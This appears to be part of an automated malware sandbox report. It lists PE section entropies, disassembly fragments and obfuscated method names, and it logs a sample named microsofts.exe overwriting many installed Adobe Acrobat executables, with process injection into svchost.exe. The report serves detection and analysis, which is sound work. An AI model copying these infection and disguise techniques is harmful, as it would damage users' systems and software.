                        Source: chrome_pwa_launcher.exe.3.dr Static PE information: section name: LZMADEC
                        Source: chrome_pwa_launcher.exe.3.dr Static PE information: section name: _RDATA
                        Source: chrome_pwa_launcher.exe.3.dr Static PE information: section name: malloc_h
                        Source: chrmstp.exe.3.dr Static PE information: section name: .00cfg
                        Source: chrmstp.exe.3.dr Static PE information: section name: .gxfg
                        Source: chrmstp.exe.3.dr Static PE information: section name: .retplne
                        Source: chrmstp.exe.3.dr Static PE information: section name: CPADinfo
                        Source: chrmstp.exe.3.dr Static PE information: section name: LZMADEC
                        Source: chrmstp.exe.3.dr Static PE information: section name: _RDATA
                        Source: chrmstp.exe.3.dr Static PE information: section name: malloc_h
                        Source: alg.exe.3.dr Static PE information: section name: .didat
                        Source: GoogleCrashHandler64.exe.3.dr Static PE information: section name: _RDATA
                        Source: GoogleCrashHandler64.exe.3.dr Static PE information: section name: .gxfg
                        Source: GoogleCrashHandler64.exe.3.dr Static PE information: section name: .gehcont
                        Source: FXSSVC.exe.3.dr Static PE information: section name: .didat
                        Source: elevation_service.exe.3.dr Static PE information: section name: .00cfg
                        Source: elevation_service.exe.3.dr Static PE information: section name: .gxfg
                        Source: elevation_service.exe.3.dr Static PE information: section name: .retplne
                        Source: elevation_service.exe.3.dr Static PE information: section name: _RDATA
                        Source: elevation_service.exe.3.dr Static PE information: section name: malloc_h
                        Source: elevation_service.exe0.3.dr Static PE information: section name: .00cfg
                        Source: elevation_service.exe0.3.dr Static PE information: section name: .gxfg
                        Source: elevation_service.exe0.3.dr Static PE information: section name: .retplne
                        Source: elevation_service.exe0.3.dr Static PE information: section name: _RDATA
                        Source: elevation_service.exe0.3.dr Static PE information: section name: malloc_h
                        Source: GoogleUpdateComRegisterShell64.exe.3.dr Static PE information: section name: _RDATA
                        Source: GoogleUpdateComRegisterShell64.exe.3.dr Static PE information: section name: .gxfg
                        Source: GoogleUpdateComRegisterShell64.exe.3.dr Static PE information: section name: .gehcont
                        Source: 117.0.5938.132_chrome_installer.exe.3.dr Static PE information: section name: .00cfg
                        Source: 117.0.5938.132_chrome_installer.exe.3.dr Static PE information: section name: .retplne
                        Source: maintenanceservice.exe.3.dr Static PE information: section name: .00cfg
                        Source: maintenanceservice.exe.3.dr Static PE information: section name: .voltbl
                        Source: maintenanceservice.exe.3.dr Static PE information: section name: _RDATA
                        Source: msdtc.exe.3.dr Static PE information: section name: .didat
                        Source: msiexec.exe.3.dr Static PE information: section name: .didat
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_004171D1 push ecx; ret 0_2_004171E4
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00493419 push edx; iretd 2_2_0049341B
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00492A2E push edi; iretd 2_2_00492A38
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00491C8C push cs; iretd 2_2_00491C8D
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00491B79 push FFFFFF87h; retf 2_2_00491B7C
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00495B0C pushfd ; iretd 2_2_00495B0D
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF7DF0 push 04DF7D4Bh; ret 2_2_04DF7D80
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF7DF0 push 04DF7DD7h; ret 2_2_04DF7D9F
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF7DF0 push 04DF7D5Fh; ret 2_2_04DF7DB3
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF7DF0 push 04DF81E6h; ret 2_2_04DF7E2D
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF7DF0 push 04DF7FCCh; ret 2_2_04DF82BB
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF7DF0 push 04DF8468h; ret 2_2_04DF852D
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF8550 push 04DF852Eh; ret 2_2_04DF7F3A
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF8550 push 04DF8514h; ret 2_2_04DF7F66
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF8550 push 04DF7E66h; ret 2_2_04DF8057
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF8550 push 04DF817Ah; ret 2_2_04DF808B
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF8550 push 04DF82E5h; ret 2_2_04DF80D9
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF8550 push 04DF826Ah; ret 2_2_04DF819E
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF8550 push 04DF849Ch; ret 2_2_04DF81E4
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF8550 push 04DF8321h; ret 2_2_04DF82E0
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF8550 push 04DF7FBFh; ret 2_2_04DF831F
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF8550 push 04DF7FA8h; ret 2_2_04DF834C
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF8550 push 04DF84BAh; ret 2_2_04DF83E2
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF8550 push 04DF8426h; ret 2_2_04DF84D8
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF8550 push 04DF8075h; ret 2_2_04DF84FD
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF8550 push 04DF808Ch; ret 2_2_04DF8512
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF8550 push 04DF8B6Fh; ret 2_2_04DF8596
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF8550 push 04DF8D45h; ret 2_2_04DF87D3
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF8550 push 04DF8AB5h; ret 2_2_04DF8B13
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF8550 push 04DF8784h; ret 2_2_04DF8CA1
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DF8550 push 04DF8DC9h; ret 2_2_04DF8E1C
                        Source: Native_Redline_BTC.exe.2.dr Static PE information: section name: .text entropy: 7.954598996291746
                        Source: Acrobat.exe.3.dr Static PE information: section name: .reloc entropy: 7.857631755465171
                        Source: Aut2exe.exe.3.dr Static PE information: section name: .rsrc entropy: 7.800647868663725
                        Source: Aut2exe_x64.exe.3.dr Static PE information: section name: .rsrc entropy: 7.800502604771287
                        Source: setup.exe.3.dr Static PE information: section name: .rsrc entropy: 7.6447025073156185
                        Source: AutoIt3_x64.exe.3.dr Static PE information: section name: .reloc entropy: 7.943913621723357
                        Source: appvcleaner.exe.3.dr Static PE information: section name: .reloc entropy: 7.935623432618263
                        Source: SciTE.exe.3.dr Static PE information: section name: .reloc entropy: 7.912305710712822
                        Source: IntegratedOffice.exe.3.dr Static PE information: section name: .reloc entropy: 7.926747975370649
                        Source: OfficeC2RClient.exe.3.dr Static PE information: section name: .reloc entropy: 7.716522382225306
                        Source: officesvcmgr.exe.3.dr Static PE information: section name: .reloc entropy: 7.937207234614563
                        Source: chrome_pwa_launcher.exe.3.dr Static PE information: section name: .reloc entropy: 7.940566078634458
                        Source: chrmstp.exe.3.dr Static PE information: section name: .reloc entropy: 7.9410032695127475
                        Source: AppVClient.exe.3.dr Static PE information: section name: .reloc entropy: 7.936504508423798
                        Source: jucheck.exe.3.dr Static PE information: section name: .reloc entropy: 7.931064282879065
                        Source: jusched.exe.3.dr Static PE information: section name: .reloc entropy: 7.936038368666534
                        Source: FXSSVC.exe.3.dr Static PE information: section name: .reloc entropy: 7.942256869001456
                        Source: elevation_service.exe.3.dr Static PE information: section name: .reloc entropy: 7.9439301488013765
                        Source: elevation_service.exe0.3.dr Static PE information: section name: .reloc entropy: 7.945937629111516
                        Source: 117.0.5938.132_chrome_installer.exe.3.dr Static PE information: section name: .reloc entropy: 7.934759165643959
                        Source: Native_Redline_BTC.exe.2.dr, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'vBXN2xV7mCTjW', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                        Source: 2.2.svchost.exe.6200000.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'vBXN2xV7mCTjW', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                        Persistence and Installation Behavior

                        Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\cfd441acea3434e2.bin
                        Source: C:\Windows\SysWOW64\svchost.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
